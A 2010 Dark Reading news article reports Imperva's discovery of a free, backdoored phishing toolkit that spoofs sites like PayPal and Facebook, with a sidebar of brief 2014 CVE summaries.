Attacks/Breaches
7/23/2010
01:50 PM
Connect Directly
RSS
E-Mail
50%
50%

Imperva Identifies Cloud Based Phishing Kit

Cybercriminals can create attacks spoofing 16 sites, including Facebook, RapidShare and Skype, using the next-generation phishing toolkit.

A recently released, next-generation phishing toolkit promises to automate the tedious task of tricking people into visiting websites designed to steal their financial information. Even better, the toolkit is free. The only hitch: the creators added a backdoor, allowing them to also amass all of the data captured by their phishing toolkit, no matter who uses it.

In other words, it's a pyramid scheme written by hackers to target other hackers, as well as you. While one attacker may amass dozens or hundreds of credentials, the toolkit's creators get the combined take and likely, first stab at every stolen credential.

To date, the toolkit has been widely used to launch phishing attacks that spoof major companies. "The ones we know of are PayPal, Hotmail and Yahoo," said Rob Rachwald, director of security strategy at Imperva, which discovered the toolkit. But the toolkit's settings allow attackers to create attacks spoofing 16 sites in total, including Facebook, RapidShare and Skype. The toolkit is written in English, but includes a tutorial written in Arabic.

Attacks using the toolkit remain very much at large. Furthermore, its creators boasted that the toolkit has been downloaded more than 200,000 times, though obviously, take that number with a grain of salt. "There's no way to validate that, but even if he's exaggerating, and you go with 20,000 times, and everyone who used it manage to get 100 credentials," that's a lot of stolen data, said Rachwald.

Unfortunately, attacks based on the toolkit are likely to stay in circulation. That's because the toolkit uses separate websites for hosting the attack and gathering the stolen data -- a little seen innovation for automated phishing attacks. As a result, said Rachwald, "it may be easy to pull the front end" -- meaning the attack website, which spoofs a real website -- off of the web. "But it's hard to eliminate the back end" that collects data.

If an easy way to block the toolkit remains unknown, one thing that has been positively identified is the identity of the creators, who apparently like to brag. Rachwald said that through "a combination of us being clever and them being stupid," Imperva managed to identity the toolkit creators, including names, photographs and current location -- Algeria.

What did Imperva do, once it learned their identities? "We're not the FBI. So we let some people know," said Rachwald.

Comment  | 
Print  | 
More Insights
Register for Dark Reading Newsletters
White Papers
Flash Poll
Current Issue
Cartoon
Video
Slideshows
Twitter Feed
Dark Reading - Bug Report
Bug Report
Enterprise Vulnerabilities
From DHS/US-CERT's National Vulnerability Database
CVE-2014-0914
Published: 2014-07-30
Cross-site scripting (XSS) vulnerability in IBM Maximo Asset Management 6.2 through 6.2.8 and 6.x and 7.x through 7.5.0.6, Maximo Asset Management 7.5 through 7.5.0.3 and 7.5.1 through 7.5.1.2 for SmartCloud Control Desk, and Maximo Asset Management 6.2 through 6.2.8 for Tivoli IT Asset Management f...

CVE-2014-0915
Published: 2014-07-30
Multiple cross-site scripting (XSS) vulnerabilities in IBM Maximo Asset Management 6.2 through 6.2.8, 6.x and 7.1 through 7.1.1.2, and 7.5 through 7.5.0.6; Maximo Asset Management 7.5 through 7.5.0.3 and 7.5.1 through 7.5.1.2 for SmartCloud Control Desk; and Maximo Asset Management 6.2 through 6.2.8...

CVE-2014-0947
Published: 2014-07-30
Unspecified vulnerability in the server in IBM Rational Software Architect Design Manager 4.0.6 allows remote authenticated users to execute arbitrary code via a crafted update site.

CVE-2014-0948
Published: 2014-07-30
Unspecified vulnerability in IBM Rational Software Architect Design Manager and Rational Rhapsody Design Manager 3.x and 4.x before 4.0.7 allows remote authenticated users to execute arbitrary code via a crafted ZIP archive.

CVE-2014-2356
Published: 2014-07-30
Innominate mGuard before 7.6.4 and 8.x before 8.0.3 does not require authentication for snapshot downloads, which allows remote attackers to obtain sensitive information via a crafted HTTPS request.

Best of the Web
Dark Reading Radio